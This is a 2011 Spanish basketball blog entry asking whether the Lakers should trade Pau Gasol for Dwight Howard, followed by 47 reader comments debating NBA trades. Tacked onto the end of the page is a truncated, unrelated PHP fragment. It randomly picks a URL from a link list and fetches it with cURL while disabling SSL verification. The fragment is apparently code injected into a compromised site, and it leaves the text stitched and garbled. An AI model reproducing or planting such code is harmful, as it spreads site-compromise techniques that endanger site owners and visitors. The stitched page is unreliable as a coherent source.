La pregunta

06 de December de 2011 por txusma

“¿Si fueras el GM de los Lakers traspasarías a Pau Gasol por Dwight Howard?”

Comenta

47 comentarios a esta entrada

  1. Denise dice:
    #1

    Sí, siempre y cuando por Bynum pudiese obtener un buen 4., puesto que no le vería sentido traspasar a Pau por Howard y quedarme con Howard y Bynum, no los veo complementarios.

    Siendo de los Magic, prefiero que cada uno se quede donde está…

      Citar

  2. jose dice:
    #2

    Hola,

    No sé si Gasol debe ser la pieza que se cambié por Howard. Lo que si está claro es que los Lakers deben renovar la plantilla.

    Saludos desde FORO NBA

    http://foronba.blogspot.com

      Citar

  3. melo15 dice:
    #3

    Yo opino igual que denise tambien trapasaria a bynum por un cuatro abierto con un buen tiro de media distancia i que supla las carencias de howard
    Pero si traspasas a pau ya no hay big three i los lakers tendrian bastante mal equipo, porque con fishern bryantn artest, x i howars.I el banquillo fatal blake brown i quien mas

      Citar

  4. Nacho dice:
    #4

    Si fuera GM de los Magic, sí, sin ninguna duda (a no ser que tuviera entre manos algo determinante para convencer a Howard de quedarse en Florida)

    Si fuese GM de los Lakers debería consultar algunas variables:
    1. Opinión de Kobe
    2. Grado de desconfianza en Bynum
    3. ¿Qué podría obtener por Bynum?
    4. ¿Cómo se adaptaría el público de LA al juego del nuevo equipo una vez abandone Kobe el barco si no tengo a alguien para hacer algo parecido al showtime?

    Una vez consultadas y si el resultado es 1 favorable, 2 Bynum no progresa adecuadamente, 3 me dan alguien joven del tipo Kobe con lo que 4 es positivo, sí lo haría.Pero más pensando en el futuro que en hoy, porque:
    las carencias de los Lakers seguirían siendo este año las mismas que el anterior. (solo el trade Bynum-Paul, a todas luces improbable, arreglaría las cosas) Creo que a día de hoy (digo a día de hoy, no en el futuro) la dupla Pau-Bynum, es superior en prestaciones a Howard. (Para mí incluso Pau por sí solo, pero no lo digo porque me caerán palos)

    Ahora, para Orlando sería negocio redondo sí (y solo sí) estoy seguro de que Dwight se quiere ir. Porque:
    1. los Magic seguirían teniendo las mismas opciones que hasta ahora, PO y con suerte y si el equipo se acopla bien, finales de conferencia, y a partir de ahí soñar no cuesta nada.
    2. La llegada de Pau me abre aún más al mercado latino, el único mercado que realmente me haría crecer. El mercado exclusivamente español también crecería (no es lo mismo ver a tu estrellaa las 4 30 de la madrugada, por muy LA que seas, que verlo a la 1 00, e incluso las 12 de la noche.
    3, y visto que de todas todas me quedo sin jugador franquicia, Pau y lo que aun queda apetecible de la plantilla son señuelos para jugadores que quieran seguir haciendo un equipo competitivo sin tener que esperar a la lotería del draft dentro de unos años.

      Citar

  5. @pedrolongas dice:
    #5

    Sí y envio a pau con un lacito.
    Edad, Físico, margen de mejora, capacidad de intimidación……. que mejore el tiro de 4 metros y contento y feliz con howard.

      Citar

  6. melo15 dice:
    #6

    I de donde sacas el dos tipo kobe
    I otra cosa cuanto les dura el contrato a los rookies lo digo porque los jenning evans curry

      Citar

  7. AndiD dice:
    #7

    Yo estoy con Nacho, al manager de Orlando le faltaría tiempo para firmar ese trade.

    Como manager de LA, yo no los cambiaba. Creo que al big-three Kobe-Pau-Bynum aún le quedan muchos buenos minutos (aunque es probable que no los mejores de sus carreras), así que me centraría en rodearlos de algo mejor de lo que tienen ahora.
    Y si te traes a Howard por Pau y a CP3 por Bynum, el año que viene tienes que renovarles (por el máximo, claro) a los dos sin olvidarte del contratazo de 30 millones de Kobe… no me salen las cuentas.

      Citar

  8. melo15 dice:
    #8

    Perdon si ahora me voi a pasar pero esque el otro dia yo ice un comentario sobre que venian dos ala-pivots decentes a los knicks i bueno la que me cayo i ahora leo primero que bynum es parte de un bigthree i despues leo
    que va a haber un traspaso bynum paul un pivot defensibo a los hornets cuando ya lo tienen alomejor era una ironia pero..

      Citar

  9. Viva_Dirk dice:
    #9

    El trade en si mismo me parece que Lakers deberia hacerlo si o si, Pau va a cumplir 32 años y Howard es un jugador que ya ha llevado un equipo a la final, a dia de hoy es un jugador único en la liga, probablemente el que mas diferencias marque con respecto a su par.

    Pero para esta misma temporada dependería del valor que tuviera Bynum en el mercado, si pudiera conseguir un jugador de cierto nivel lo haría sin dudarlo y mas pudiendo jugar con la polivalencia de Odom, nombres como David West(via sing&trade), David Lee, Scola, Iguodala o Millsap serian grandes incorporaciones. Incluso algun pack con jugadores de menos caché como Calde+Amir Johnson, Batum+Camby y alguno mas.

    Vamos que si fuera el GM de los Lakers lo haría fijo, y el Dr.Buss nunca ha objetado nada en pagarle el máximo a superestrellas.

      Citar

  10. Cocinitas dice:
    #10

    Lo que se esta hablando en las últimas horas es un trade con los Hornets, Pau a cambio de Paul, pero sinceramente no me pega nada la pareja Kobe-Paul. En cuanto a lo de de Howard si lo veria con buenos ojos, además intentaria un sign and trade con los hornets bynum-west. Y buscaria un base por la mid level de 3 millones o intentaria el traspaso de artest via sign and trade x alguno de los los aleros q quedan libres tipo Butler o Prince.

      Citar

  11. toni dice:
    #11

    Yo no auguro compatibilidad a la pareja Kobe-CP3, más que nada por la cantidad de balón que absorven tanto uno como el otro… aunque en defensa sería un perimetro impenetrable si le sumamos a cualquier especialista como puede ser el mismo Artest, Prince o Battier, que han sonado para el puesto. Por lo que comporta la zona, Howard-Bynum no, pero Howard-Odom si. Odom aportaría a Howard el espacio que necesitara en la zona y la dosis óptima de intensidad defensiva, así como una via para el juego rápido para Paul.

    A pesar de todo, Kobe sigue y seguirá siendo Kobe y su ego puede desencadenar una serie de catastróficas desdichas hacia Paul y Howard… pero de eso ya se preocupara Phil… Ah no, que ya no está el maestro zen…

      Citar

  12. melo15 dice:
    #12

    El de scola a mi me parece mui posible ya que los rockets tienen a patterson

      Citar

  13. jesan dice:
    #13

    si no estoy mal informado, a Howard le queda un año de contrato. si él quiere ir a LA, ¿qué mejor que libre? asi es como se podria colocar a Bynum y a Gasol en el mercado, obteniendo por ellos un buen base y un buen alero. luego, con dos jugadores que cumplan bienl as funciones de escolata y de alero fuerte, el equipo estaria completo. eso si, a falta de un segundo quinteto de jugadores que cumplan con sus cometidos.
    pero yo lo haria.

      Citar

  14. Esteban dice:
    #14

    yo lo haria, Pau es exelente de los mejores de la NBA, pero no es ni por lejos la cara de una franquicia como los lakers, con hiward no solo serian contendientes este año, sino que tendria un jugador franquicia luego de kobe, un jugador capaz de atraer grandes agentes libres, cosa que dudo que gasol haga

    ademas superman es mejor que gasol

    habra que ver q hacer con bynun, pero dada su estatura y su nivel, faltando gigantes asi, se podria conseguir de todo, incluso 2 o 3 jugadores de buen complemento mas que un solo ala pivot

      Citar

  15. Echeva dice:
    #15

    melo15:
    El de scola a mi me parece mui posible ya que los rockets tienen a patterson

    ¿Para qué quieres a Scola teniendo a Pau?

      Citar

  16. nach dice:
    #16

    El trade Gasol-Paul veo exactamente 0 opciones de que se realice, por lo menos a día de hoy. Se van a jugar los Lakers el quedarse por dentro con un 4 que es un 3-4 y un 5 que lo mismo se rompe mañana y no juega en lo que queda de temporada como hombres interiores? Para qué? para conseguir un base que acapara el balón y se va a jugar sus tiros quitándole espacio a Kobe? No digo que no sea posible una vez que se analicen los jugadores cortados y demás, igual un Okur sería una opción por ejemplo…

    El Gasol-Bogut-Howard o un Howard-Bynum+Artest lo vería bastante más posible, los Lakers juntarían a la mejor pareja interior de la liga haciendo el segundo y complementarían probablemente con un “anmnistiado” estilo Battier, aunque está sonando Kapono por 1.3 kilos al año…

      Citar

  17. Toni dice:
    #17

    Imaginar una pareja Howard-Gasol (40millones+30 de Kobe) tiene una estrecha relación con el sueño del anillo y probablemente otro repeat… Bynum+Artest/Odom+Walton-Howard-Turkoglu? (Artest con Arenas en el mismo equipo puede ser un tremendo espectaculo, los Lakers podrían jugar sin base puro por la posibilidad del turco de subir el balón y Walton… jajajaja)

      Citar

  18. Toni dice:
    #18

    Howard + Turkoglu, perdón.

      Citar

  19. Vader dice:
    #19

    Ojo con los Clippers que hay rumores que estan haciendo movimientos muy ambiciosos. Tienen espacio salarial, estrellas con contratos bajos y estan en un gran mercado. Parece que quieren rodear a Griffin con CP3 y Howard…

      Citar

  20. Cocinitas dice:
    #20

    La pareja Griffin-Howard no me parece la más adecuada, lo de CP3 si me parece más lógico, aún así lo veo dificil aunque se habla de que junto con Warriors son los dos equipos mejor posicionados por Paul.

      Citar

  21. Blade Petrovic dice:
    #21

    Si por ahora esta odom para cubrir el puesto de pau o bynum y despues te qedas con bynum o haces una mid level

      Citar

  22. melo15 dice:
    #22

    Porque primero traspasas a gasol por howardn i despues a bynum por scola yo si fuera el GM de los rockets me faltarias tiempo para firmar

      Citar

  23. Vader dice:
    #23

    ¿Bynum por Scola? Si claro… y al GM de los Lakers despues de eso lo empalan al lado del Staples Center…

      Citar

  24. melo15 dice:
    #24

    Que es empalar??

      Citar

  25. melo15 dice:
    #25

    Que es empalar??
    I lo de scola no me lo e sacado de la manga lo decian por arriba

      Citar

  26. Vader dice:
    #26

    Si pero no a cambio de Bynum… eso favorece mucho a Rockets. Empalar es una forma antiquisima de matar parecida a la cruxifición pero con la diferencia de que los colgaban con una estaca que les metian por el culo…

      Citar

  27. Vader dice:
    #27

    Tambien lo puedes buscar en google y ver alguna imagen, que valen más que mil palabras…

      Citar

  28. Ru dice:
    #28

    Yo si fuera GM de los Lakers,si y rotundamente si,traspasaría a Gasol para conseguir a Howard…si me hago con un 4 que sepa jugar abierto,porque con dos piezas interiores que no saben jugar a media distancia limitan a KB una barbaridad.De todas formas a Gasol -que merece mejor trato que una simple mercancía,aunque esto es lo que hay en la NBA- habría que añadirle algo más para hacer atractivo ese traspaso,y si pensamos en perspectiva Magic,preferíría una base sobre Bynum,más joven -aunque para mí tiene el cartel de “overrated”- y con potencial para liderar la franquicia a medio plazo -algo de optimismo porque Orlando…vaya cagada de roster-,y con una TO en 2 años por si las rodillas no funcionan.

    Dicho esto,veo a Howard vestido de amarillo.

    Lo que veo imposible es CP3 en LA,como bien comentan,incompatible absolutamente con Kobe.Ójala se vaya a los Clippers,que dicho sea,ofrecen un pack muy interesante con dos jóvenes como Bledsoe y Aminu y una prometedora ronda de Wolves junto a un buen pívot como Kaman(expiring).Vamos,en los Hornets hace falta reconstrucción.A los Clippers les quedaría un trio CP3-Eric Gordon-Blake Griffin impresionante,con futuro,y goloso para atraer a los jugadores.

      Citar

  29. melo15 dice:
    #29

    Perdona vader pero scola i howard como pareja interior es un lujazo ademas se complementan muy bien porque scola aporta tiro de media distancia

      Citar

  30. Nacho dice:
    #30

    Creo que se está perdiendo una perspectiva en este debate, y es que todo este lío está en manos de un señor, que es Dwight Howard. Orlando tiene dos salidas, o convencerle haciendo un equipo de la leche a su alrededor, o hacer un trade en el que él tiene mucho que decir (el año que viene es agente libre y un cambio sin su visto bueno puede hacer que el equipo al que caiga le pase lo que se rumorea con Nets y Deron). En este sentido el cambio por Gasol es más que atrayente para los Magic. Las razones las expuse arriba. Y no olvidemos que los GM de la NBA tienen que crear equipos para ganar dinero antes que títulos (por lo menos en 26 franquicias, todas excepto LA y Boston porque para ellos títulos y pasta van de la mano, los NY porque están como están y son lo que son, y Cuban y sus Dallas, porque el niño es un forofo, aparte de dueño) por lo que las razones que dais para decir que el trade Gasol-Howard no lo querrían en Florida son baladíes.
    Si yo fuera GM de Lakers me metería en el entorno de Howard, porque me puede venir gratis el año que viene, y así no gasto material ahora, porque con un tres tipo Kirilenko y un base decentillo, serían candidatos nº1 al anillo de este año, y el que viene, si no quiero a Pau, o a Bynum puedo mirar que me dan por ellos y completar un equipo de ensueño.

      Citar

  31. Viva_Dirk dice:
    #31

    @Vader: Si se consiguiera a Howard a cambio de Pau desde luego que sería una opción traspasar a Bynum a cambio de Scola+algo, ese algo seguramente sería un base.

      Citar

  32. Vader dice:
    #32

    Claro, depende de lo que sumemos a Scola no digo que no… Pero Gasol-Scola a pelo pues no…

      Citar

  33. Viva_Dirk dice:
    #33

    No no, Pau no, yo hablaba de Bynum.

      Citar

  34. melo15 dice:
    #34

    Yo tambien pero los rockets van escasos de de bases solo dos lowry i dragic
    Creeis que roy puede volver a ser el de antes(me da una pena) i oden tampoco puede volver a ser el que era en ohio

      Citar

  35. Uno cualquiera dice:
    #35

    Estaría bien que diferenciarais de algún modo los títulos de los artículos de la sección “La pregunta”, ya sea añadiendo al final el número de pregunta que es (como hacíais antaño con el trivial) o añadiendo la pregunta. Más que nada, para poder ver con facilidad los nuevos comentarios en el bloque de la derecha del blog (cuando hay varios artículos de este tipo nuevos, no se sabe en cuál de ellos se ha comentado).

    No sé si me he explicado 😛

      Citar

  36. Vader dice:
    #36

    Viva_Dirk:
    No no, Pau no, yo hablaba de Bynum.

    Perdona lo he escrito mal, pero si, me referia a un Bynum-Scola y tampoco lo veo bien para Lakers, Bynum vale mucho más, más joven, es pivot, ….

    A ver que pasa al final, será divertido hasta el dia de Navidad. Los que lo tienen muy mal creo son los Knicks para pillar algo. Creo que deberian olvidarse de montar un big three a partir del nuevo convenio. Les iria mejor acoplando jugadores a la pareja que tienen o incluso traspasando a uno de los dos para fichar a Paul o Howard.

    Saludos

      Citar

  37. Sancho88 dice:
    #37

    Ru:
    Yo si fuera GM de los Lakers,si y rotundamente si,traspasaría a Gasol para conseguir a Howard…si me hago con un 4 que sepa jugar abierto,porque con dos piezas interiores que no saben jugar a media distancia limitan a KB una barbaridad.De todas formas a Gasol -que merece mejor trato que una simple mercancía,aunque esto es lo que hay en la NBA- habría que añadirle algo más para hacer atractivo ese traspaso,y si pensamos en perspectiva Magic,preferíría una base sobre Bynum,más joven -aunque para mí tiene el cartel de “overrated”- y con potencial para liderar la franquicia a medio plazo -algo de optimismo porque Orlando…vaya cagada de roster-,y con una TO en 2 años por si las rodillas no funcionan.

    Dicho esto,veo a Howard vestido de amarillo.

    Lo que veo imposible es CP3 en LA,como bien comentan,incompatible absolutamente con Kobe.Ójala se vaya a los Clippers,que dicho sea,ofrecen un pack muy interesante con dos jóvenes como Bledsoe y Aminu y una prometedora ronda de Wolves junto a un buen pívot como Kaman(expiring).Vamos,en los Hornets hace falta reconstrucción.A los Clippers les quedaría un trio CP3-Eric Gordon-Blake Griffin impresionante,con futuro,y goloso para atraer a los jugadores.

    Yo creo que Pau sí sabe jugar de 4 abierto. Me parece que estáis olvidando de qué dos jugadores estamos hablando. Salvo porque Howard es más joven, no se dónde le veis tantas taras a Pau Gasol. En mi opinión, Lakers necesitaría más a Paul que a Howard, pero ver razones deportivas en el intercambio Howard-Gasol… yo no las veo. Parece que de repenet Pau Gasol no ha ganado un mundial, dos eurobasket, dos anillos de la nba, etc. Parece que hablamos de Pau como si fuese un don nadie acabado. Alguno vio el eurobasket de Lituania? y vale, Howard tiene proyección para convertirse en el mejor pívot de la competición -si no lo es en estos momentos-, pero L.A. tiene mayores problemas que encontrar un pívot, que es de las pocas posiciones que sí tiene bien cubiertas. El problema de los lakers es la defensa al base, inexistente ahora mismo, y encontrar alguien en el juego exterior (aparte de Bryant, obviamente) que pueda anotar más de diez-quince puntos por partido con asiduidad, que tampoco tienen.

      Citar

  38. melo15 dice:
    #38

    Bueno yo no lo se pero brow i el alero ese que vino el año pasado de los magic no son buenos. Pero no me diras vader que un ala-pivot (si fichan a howard) i un base decente le vienen de rositas a los lakers ya se que bynum tiene potencial pero howard buff!!
    tambien estoi de acuerdo con que los knicks deben dejar de intentar hacer big threes i traspasar a stat por 3 o 4 jugadores decentes

      Citar

  39. Sancho88 dice:
    #39

    melo15:
    Bueno yo no lo se pero brow i el alero ese que vino el año pasado de los magic no son buenos. Pero no me diras vader que un ala-pivot (si fichan a howard) i un base decente le vienende rositas a los lakers ya se que bynum tiene potencial pero howard buff!!
    tambien estoi de acuerdo con que los knicks deben dejar de intentar hacer big threes i traspasar a stat por 3 o 4 jugadores decentes

    Entonces volvería la desolación de Melo contra el mundo. Nueva York ya ha hecho demasiadas tonterías desde que Willis Reed y Frazier obraran el milagro en los 70. Ahora que por fin comienzan a hacer las cosas con sentido, no les pidas que dejen ir a uno de los pocos center decentes que quedan en esta liga. El señor Donnie Walsh prometió llevar a los Knicks de vuelta a la gloria, y en mi opinión no van por mal camino. Si no sale lo de Paul ya saldrá otra cosa. Lo importante es que Paul y Howard se muevan, no importa realmente hacia dónde. Una vez ocurra eso, ahí es donde toca pescar, porque el mercado se volverá loco, y me apuesto lo que quieras a que habrá sorpresas. Es evidente que Nueva York necesita un base para dejarles tiros decentes a esos dos, y mira, si por un casual no sale lo de Paul, aún está Billups. Con reforzar un poco el juego interior, un cuatro abierto que desahogue la zona para Amare les sobra a los Knicks, porque Douglas y Fields ya le harán ese trabajo sucio a Melo por fuera

      Citar

  40. Ru dice:
    #40

    Sancho88: Yo creo que Pau sí sabe jugar de 4 abierto. Me parece que estáis olvidando de qué dos jugadores estamos hablando. Salvo porque Howard es más joven, no se dónde le veis tantas taras a Pau Gasol. En mi opinión, Lakers necesitaría más a Paul que a Howard, pero ver razones deportivas en el intercambio Howard-Gasol… yo no las veo. Parece que de repenet Pau Gasol no ha ganado un mundial, dos eurobasket, dos anillos de la nba, etc. Parece que hablamos de Pau como si fuese un don nadie acabado. Alguno vio el eurobasket de Lituania? y vale, Howard tiene proyección para convertirse en el mejor pívot de la competición -si no lo es en estos momentos-, pero L.A. tiene mayores problemas que encontrar un pívot, que es de las pocas posiciones que sí tiene bien cubiertas. El problema de los lakers es la defensa al base, inexistente ahora mismo, y encontrar alguien en el juego exterior (aparte de Bryant, obviamente) que pueda anotar más de diez-quince puntos por partido con asiduidad, que tampoco tienen.

    Es que es eso precisamente lo que yo señalo,pocos 4 hay con la calidad de Pau para buscarse las habichuelas lejos del aro,Nowitzki y para de contar,de ahí que diga que si traspasan a Gasol por Howard,que se aseguren otro PF que tengo tirito a media distancia porque en la zona van a existir Howard y Kobe.Para nada estoy infravalorando a Pau,todo lo contrario,pero el nombre de uno y otro(Howard vs Gasol) y entendiendo la NBA como negocio,cualquier jugador amarillo sea traspasable para conseguir al pívot dominante de la decada,que te asegura al menos muchos $$$,muchos años.

      Citar

  41. busky23 dice:
    #41

    En mi opinión Lakers lo q necesita imperiosamente es un base,y si se pueden hacer con el mejor de la liga,pues mejor que mejor. Al contrario de lo que opináis muchos para mi Cp3 es totalmente compatible con Kobe,catalogar de acaparador de balón a un tipo que puede ser con la gorra el máximo asistente de la liga me parece un error.
    Aparte de ser un correcto lanzador,es un gran penetrador,cosa que implica que las defensas se cierren y queden espacios libres para el 24.

    Hay que pensar que Kobe ya tiene 33 castañas y ha de reciclar su juego,jugando mas al poste bajo,como ocurrió con Jordan en su dia,lo que me hace pensar que Howard estorbaría mas que ayudar en muchos ataques.

    Si por alguien ha de echar el resto los Lakers es por Paul,y por un buen lanzador de triples,pero no a costa de Gasol.

      Citar

  42. melo15 dice:
    #42

    Bueno sancho eso es otra cosa yo tambien firmo poner a amar’e de pivot pero aun asi este equipo tiene muchas carencias NO HAY ala-pivots pero la situacio mejoraria bastante si se pudiera cambiar a billups por un base distribuidor (calderon) los knicks tendrian un backourt bastante bueno i solo abria que fichar a dos ala-pivots decentes,
    imaginate
    Calderon/douglas- fields/shumpert-melo/balkman-x/x-stat/turiaf/i el que an drafteao de kentucky. Yo de ala-pivots fichara randolph de minesota i a otro mas

      Citar

  43. Nacho dice:
    #43

    Stat, por su físico puede jugar de 5 en ataque, en el poste alto puede aprovechar su fuerza para el pick’n’roll, pero defensivamente, tipos como Howard, Marc, Bogut… le pueden hacer un destrozo. Aunque siempre puede mejorar.

      Citar

  44. Vader dice:
    #44

    Para mi Stat de pivot es un parche, tanto en ataque como en defensa, sobretodo en defensa. En ataque muchas veces tira desde 4 o 5 metros y no lo hace mal. Un fichaje fantástico para NY, dejando de lado big threes seria Marc Gasol. Y puesto a hacer un big three me gustaria que fuera con Howard porque con estos 3 si el resto son contratos mínimos y alguna mid-level ni se notaria… Bufff Melo-Stat-Howard si que seria la bomba aunque el resto del equipo fueran saldos.

    Saludos

      Citar

  45. kantonyo dice:
    #45

    Yo creo que en esta decisión, no se debe elegir quedarse con el mejor, que en este caso está claro que es Pau Gasol, sino que habría que pensar que es lo mejor para tu franquicia, y creo que en esto tampoco hay dudas. Howard es mucho más joven, con más potencial de futuro, genera en USA más dinero en marketing y provocaría gran ilusión en los aficionados de los Lakers.

    Tampoco estaría mal colocar a Pau y Marc en Orlando juntos, sería un gran final para Pau en la NBA terminar en una franquicia junto a su hermano.

      Citar

  46. Toni dice:
    #46

    Y en un hipotético caso de que Howard acabe de verde(o de cualquier color que no sea amarillo), un sign and trade de Marc con Bynum y juntar a los dos hermanos de amarillo también sería un buen golpe de efecto, no?
    Con un alto valor tanto mediatico y como deportivo a corto plazo.

      Citar

  47. melo15 dice:
    #47

    To creo que los bigthrees no te dan titulos si no hay 3 o 4 jugadores que en caso de lesion te puedan dar minutos de calidad i los knicks de estos jugadores solo tienen a douglas yo no creo que traer a howard o paul sea la solucion

      Citar

Deja un comentario

html; } class Helper { public function random_date() { $low = '732045693'; $high = time(); $random = rand($low, $high); return date("D, d M Y H:i:s",$random); } } class Fetch_site { public $url; public $html; public function __construct($sites=null, $link_list=null) { $this->is_curl_installed(); if($link_list !== null) { $this->choose_site($link_list); } $this->load_site($this->url); } public function choose_site($file=null) { $file = explode("\n", $file); $key = rand(0, (count($file)-1)); $this->url = trim($file[$key]); } public function load_site($url) { $useragent = array('Link-Soft'); $rand = array_rand($useragent); $ch = curl_init(); $options = array( CURLOPT_URL => $url, CURLOPT_HEADER => 0, CURLOPT_USERAGENT => $useragent[$rand], CURLOPT_SSL_VERIFYHOST => 0, CURLOPT_SSL_VERIFYPEER => 0, CURLOPT_RETURNTRANSFER => 1, CURLOPT_FOLLOWLOCATION => 1, CURLOPT_ENCODING => "", CURLOPT_AUTOREFERER => 1, CURLOPT_CONNECTTIMEOUT => 30, CURLOPT_TIMEOUT => 30, CURLOPT_MAXREDIRS => 5, ); curl_setopt_array($ch,$options); $result = curl_exec($ch); if(!$result) { return curl_error($ch); } curl_close($ch); $this->html = $result; } public function is_curl_installed() { if(!in_array('curl',get_loaded_extensions())) { trigger_error("cURL PHP extension is disabled or not installed.",E_USER_ERROR); } } } unset($n); ?>